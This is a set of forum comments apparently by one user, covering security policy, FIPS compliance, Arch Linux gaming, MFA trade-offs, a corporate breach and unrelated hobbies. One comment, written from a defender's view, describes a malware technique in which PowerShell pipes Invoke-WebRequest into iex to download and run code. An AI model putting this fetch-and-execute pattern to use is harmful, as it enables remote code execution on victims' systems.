sylver_dragon

They did.
While it’s been co-opted by shitheads these days, the Gadsden Flag started off as something pretty close to a meme.

https://www.youtube.com/watch?v=otdii_hrT4Q

Porn.
All six of them, just different forms of porn.

Ya, I know that’s exactly what’s going to happen. But, you have to start somewhere. Just getting management used to the idea that data must be encrypted is a start. That will then push the software vendors in the space to make fundamental changes, which will hopefully improve things a bit.

I actually have a pretty good example from my time in the US FedGov space. We were required (by our checkbox security) to enforce FIPS-140 compliance on all our systems. When working to setup a server for a new product, it just would not run with FIPS-140 in enforcement mode; so, I started digging into the product and found that they were still using the MD5 algorithm in their user password hashing process. Given how much the vendor really wanted our business (we were their “foot in the door” for more FedGov money), I sent an email to our customer service rep essentially saying “ya, MD5 as part of the password hashing is a deal breaker”. A couple weeks later a new version of the product dropped and surprise, surprise, MD5 was no longer part of the password hashing process.

The reliance on checkboxes sucks; but, they can be a useful club to make improvements. A shift to real security takes time and a lot of effort. But, that journey starts with a first step.

While I’m not a fan of checkbox security. Given that major parts of the healthcare industry don’t even seem to get over that bar, maybe it’s time to put something in place to give network defenders a lever to pull on to get the basics sorted.

Not having MFA and encryption for data at rest should be treated as willful negligence when a company is breached.

Threat actors used an existing backdoor in a communications system to intercept communications in that system? Color me whatever the opposite of “shocked” is. This is exactly the problem which was brought up by security researchers when the NSA was asking for a frontdoor which would let them break encryption. Thankfully, we held the line in that battle of the Crypto Wars. But, the war never ends and we need to make sure folks remember this clusterfuck the next time the NSA starts pushing to break encryption.

But is #7 true if they don’t have a backup?

Na, my experience is that Defender is fine with users downloading browsers and “updates” from random Russian sites. It’s happy to let the users install that software and only bothers to log a “hey, maybe this was bad” alert some time later. Edge, on the other hand, loses it’s shit when you visit the official download sites for Chrome or FireFox.

BLUF: It’s been a mixed bag, but I would call it “worth it”.

I’ve used Ubuntu a bit before. That’s what my home server runs on and has for years. Granted, most of it’s functions live in Docker containers. I also used both Debian (via Kali) and Ubuntu at work (yes, I know Ubuntu is Debian based, but it’s also big enough to have it’s own dedicated ecosystem). I work in Cybersecurity and use Linux based tools for image acquisition, digital forensics and data recovery. Kali makes for a great “it just works” system to validate vulnerabilities and poke at a network. And, between a lot of tools targeting Ubuntu and frameworks like SANS SIFT, Ubuntu gets used a lot. I also supported several Red Hat based servers at work for various tools. I’m far from an expert on Linux, but I can usually hold my own.

In a lot of ways, Arch wasn’t an obvious choice for me. And I seriously considered going with Ubuntu (or another Debian based OS (e.g. PopOS)) at first. It’s worth mentioning that my primary use for my desktop is video games. So, that heavily effected my choices. That said, the reasons for choosing Arch ended up being:

1. I have a SteamDeck and most of my games “just work” on it. With Arch being the flavor of Linux Valve is targeting, following their lead seemed like a good idea. I expected that a lot of effort to get games working on “Linux” would ultimately be focused on getting games working on Arch.
2. I wanted a “minimal” system. I can be a bit of a control freak and privacy nut. I already self-host NextCloud, because I don’t want my pictures/data sitting on someone else’s computer. So, the “install only what you need” nature of Arch was appealing.
3. I did do some testing of Ubuntu on my system and had driver issues (nVidia GPU) and some other problems I didn’t put the time into running down. In the end, it put me off Linux for a while before I came back to it and ran Arch.

One of the things I did, which was really helpful, was a “try before you buy” setup. I was coming from Windows 10. And, as mentioned above, gaming was my main use case. So, that had to work for me to make the jump. Otherwise, I was going to milk Windows 10 for as long as possible and then figure things out when it went EOS. So, I installed Arch on a USB 3.0 thumbdrive and left my Windows OS partition alone. I also mounted my “Games” drive (M.2 SSD) and installed games to that. It was still NTFS, but that only created minor bumps in the road. Running that configuration for a couple months proved out that Arch was going to work for me.

When it came time to fully change over, I formatted my Windows OS partition as ext4, setup the correct folder structure and rsync’d everything from the thumbdrive to it. So, everything was the way I’d had it for those couple months. I did have an issue that my BIOS refused to see the OS partition on the SATA SSD I used for my OS partition; but, that was MSI’s fault (I have an MSI motherboard). And that was resolved by changing where GRUB is located in my /boot partition.

Overall, I’ve been happy with the choice I made. Arch hasn’t always been easy. Even the Official Install Guide seems to come from a RTFM perspective. But, if you’re willing to put the time into it, you will learn a lot or you won’t have a functional system. And you’ll end up with a system where you can fire up a packet capture and have a really good idea of what each and every packet is about. As for gaming, so far I’ve had exactly one game which didn’t run on Linux. That was Call of Duty 6, which I was considering giving a go to play with some folks I know. But, Activision’s Anti-Cheat software is a hard “no” on Linux. So, I had to pass on that. Otherwise, every game I have wanted to play either had native Linux support or worked via Proton/WINE.

You only get a short time with the pointy end of the spear and then once a sword wielder is inside your range, you’ve got an unwieldy stick and they have a sword. Good for stand off melee maybe but prob not.

Yes, but getting in close without getting stabbed is really hard.
Here’s an actual example of modern HEMA folks giving it a lot of goes:
https://www.youtube.com/watch?v=uLLv8E2pWdk

I have a Cuisinart grind and brew, which is pushing a decade old at this point. Love the thing and will replace it with something similar if it dies before I do. But, I use Ubuntu on my server and Arch on my desktop. So, not this meme fits, but it is funny.

the minister of the interior can deport people for a period of up to 20 years to the besieged Gaza Strip or another location based on the “circumstances”

But don’t worry.
Work will make them free!

Do I even need the /s?

The diver probably has some food on him, which the stingray is trying to get.
I visited Stingray City in Grand Cayman a lot of years back. Part of the tour package was that they gave you small squid to feed to the stingrays, and they would climb up you, out of the water for that snack. Also, there were a lot of stingrays in the area. We were instructed to shuffle our feet as we walked, to avoid stepping on one. The swimmer in the picture only needed to hang out for a bit before one or more stingrays would have come over, looking for any handouts.

That said, the experience of Stingray City was absolutely worth it. Between that, and snorkeling at the barrier reef, I have a lot of fond memories of my time at Grand Cayman.

Ya, absolutely. My point was that, we shouldn’t assume that vendors are doing things right all the time. So, it’s important to have those layered defense, because vendors do stupid stuff like this.

This is a good example of why a zero trust network architecture is important. This attack would require the attacker to be able to SSH to the management interface of the device. Done right, that interface will be on a VLAN which has very limited access (e.g. specific IPs or a jumphost). While that isn’t an impossible hurdle for an attacker to overcome, it’s significantly harder than just popping any box on the network. People make mistakes all the time, and someone on your network is going to fall for a phishing attack or malicious redirect or any number of things. Having that extra layer, before they pop the firewall, gives defenders that much more time to notice, find and evict the attacker.

Also, Whiskey, Tango, Foxtrot Cisco?

Seen this one in my work environment. Confusing as heck the first time. It looks like explorer.exe in the context of the local user starts PowerShell.exe with a command line involving an Invoke-WebRequest piping the download into an Invoke-Expression (usually the shorter iex alias). No .lnk or .js file involved. Just explorer, PowerShell, infected.

WeChat’s software has security issues? Color me shocked. Shocked, I tell you.
Well, not that shocked.

Also:

WeChat’s custom encryption protocol

Don’t do that

Someone is trying to re-create the virus from Snow Crash

The Company believes the unauthorized actor exfiltrated certain encrypted internal ADT data associated with employee user accounts during the intrusion. Based on its investigation to date, the Company does not believe customers’ personal information has been exfiltrated, or that customers’ security systems have been compromised. ADT’s containment measures have resulted in some disruptions to the Company’s information systems, and the Company’s investigation is at an early stage and ongoing.

This reads a lot like a domain controller got popped. Considering that this is the second breach in a short time, and the previous one got access to customer data, I wouldn’t be surprised to find out that it’s either the same attacker or this breach was an access broker who sold credentials to the previous attacker.

That’s just my guess, and I doubt we will ever get a sufficiently detailed write-up to know. But, it seems like a likely way for the attacks to go down.

Aren’t they inherently less secure than a TOTP code?

They can be, depending on the types of threats you expect to face. If physical theft is an expected threat, then a hardware token runs the risk of being stolen and abused. For example, your attackers might just buy off cops to rob you and take your stuff. Having the physical device locked with a PIN/Passcode can mitigate this threat somewhat. But, that just becomes another password the attackers need to figure out.

On the other side of the coin, TOTP applications have started offering Cloud Backup options for accounts. What this demonstrates is that it’s possible to move those accounts between devices remotely. A hacked device means those codes may be exfiltrated to an attackers device and you will be none the wiser. Good security hygiene and device hardening can help mitigate these issues. But, it also means you need to a lot of trust in a lot of third parties. Also, you need to be unimportant enough for an attacker to not burn a 0-day on.

Ultimately, security is all about trade-offs. If you worry about physical security and don’t expect to face a threat which might compromise your phone, then a TOTP app might be a better option. If you are more worried about a hacked device being used to leak credentials, then a physical token may be a better choice. Each way you go has some ability to mitigate the risks. PIN for a physical token and device hardening for TOTP. But, neither is a silver bullet.

And, if your threat model includes someone willing and able to engage in rubber hose cryptanalysis, then you’re probably fucked anyway.

I’ve heard that in the US, the 5th amendment protects you from being forced to divulge a password, but they can physically place your finger on the finger print scanner.

Ya, it’s a weird space that you cannot be legally forced to divulge a password, except in cases where the content of the drive is a “foregone conclusion” (as defined by the US Supreme Court). But, they can absolutely collect biometric markers (including forcing a fingerprint scan).